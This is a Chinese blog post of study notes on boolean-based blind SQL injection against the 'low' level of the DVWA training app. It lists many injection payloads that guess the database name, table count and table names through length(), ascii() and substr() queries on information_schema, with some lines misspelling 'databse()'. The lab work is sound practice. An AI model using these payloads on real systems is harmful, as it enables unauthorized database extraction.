【DVWA】SQL盲注学习心得（二）

时间：2019-06-14 23:33:34 阅读：188 评论：0 收藏：0 [点我收藏+]

标签：没有 format pytho margin sub span sts miss 直接

简析

在此之前，已经学习了SQL注入，盲注是注入的进一步方法，更接近实战。而且因为“盲”字，注入也变得异常繁琐。本篇将先对DVWA的四个等级的盲注进行学习分析；然后是对盲注方法的学习心得。

在第一篇，我提到过：

习惯上输入1，可以看到返回对应1的数据库中的内容，而且输出三行，分别是

ID：1

First name：xxx

Surname：xxx

具体内容不管，总之第一行是输入的内容，原封不动显示了，二三行是可以我们直接用来显式显示的内容栏。

这里我自己的理解就是，当输入习惯性的 int型 1 时，我们可以判断很多基本信息，比如显示，根据显示我们才能决定下一步的注入代码怎么写，当显示是刚刚提到的那样，那很开心，因为完全可以利用此页面展示的部分来显示我们需要的信息。

但是，当显示的不是动态信息，而是判断结果，那就属于本篇的盲注内容了。

DVWA - SQL盲注

【1】low

第一步，

习惯输入1，返回User ID exists in the database. 虽然没有展示数据库里面的内容，但是也有反馈，还能接受。

第二步，

输入 1 and 1=2 ，依旧返回存在，可以判定存在注入点。

输入 1‘ and 1=2 # ，返回miss，到这里就可以判定，可以进行SQL字符型盲注。

第三步，

需要说明一下，这里盲注的基本思路是二分法，因为现在只有exists和miss两个选项，所以只能二分查找，一点点的找，查找的基本步骤跟注入顺序基本一致。现在先猜库名：

1.猜库名的字符长度：

输入 1’ and length(database())=1 # ，显示MISS；

继续加码， 1’ and length(database())=2 # ，依旧MISS；

继续。。。直到 1’ and length(database())=4 # ，显示exists；

猜测成功，长度为4。

2.猜库名第一个字符：

输入 1’ and ascii(substr(databse(),1,1))>97 # ，显示存在，说明第一个是大于 a 的字母；

输入 1’ and ascii(substr(databse(),1,1))<122 # ，显示存在，说明小于 z；

二分 1’ and ascii(substr(databse(),1,1))>109 # ，显示不存在，说明小于 m；

以此类推，最后显示 1’ and ascii(substr(databse(),1,1))>100 # 和 1’ and ascii(substr(databse(),1,1))<100 # 都不存在，说明第一个字母就是ASCII100对应的字母 d 。

3.库名剩余字母：

这个时候我就感觉有点烦了，这样写实在是麻烦，需要用新的方法，而不是再手工猜测，就想到利用python进行盲注攻击。虽然说手工写很cool，并可以熟悉SQL，但是我想还是造工具进步更快一点。这里留坑，计划用python+burp suits，有点像暴力破解，盲注嘛，本来就是暴力一点，等结束暴力破解篇，补上这里。

不过目前还是先继续用二分法获得剩下的库名字符。

第四步，

现在既然知道了库的名字，就该暴表了，与第一篇SQL注入攻击同样的道理，先确定表数量，再确定表名称；下面列出用到的所有注入代码，一行代表一次，注释就是返回结果：

/*确定库里有多少个表*/
1‘ and (select count(table_name) from information_schema.tables where table_schema = database())=1# --miss
1‘ and (select count(table_name) from information_schema.tables where table_schema = database())=2# --exists
/*确定第一个表字符长度*/
1‘ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)) = 1# --miss
。。。
1‘ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)) = 9# --exists
/*确定第二个表字符长度*/
1‘ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)) = 1# --miss
。。。
1‘ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)) = 5# --exists
/*确定第一个表第一个字母*/
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 97# --exists
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) < 122# --exists
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 109# --miss
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 103# --miss
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 100# --exists
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 102# --exists，验证103
1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 103# --exists
/*之后全是这个套路得到两个表的名称guestbook、users*/

第五步，

根据表暴列，同样的道理，试出列的数量，然后每个列试出列名；再根据列名选择试出需要的数据，这里不再赘述。

最后总结：

以下是我觉得需要说明，也是以后提醒自己的几个小点：

substr函数，不像C系语言里一样，它的第二个参数，是从1开始的，也就是说，假设截取第一位到第四位的str，substr(str, 1, 4)；
ascii函数，在二分法猜字符中经常用到！
table_name, column_name分别是information_schema中tables和columns的，注意对应，table_schema是查询时where里的表名
length()函数也可以用大于小于二分法快速找到
limit(m,n)函数，m从0开始，n是指读取n条

这里是对information_schema的简要说明，值得一读，留坑以后随着学习详细再说。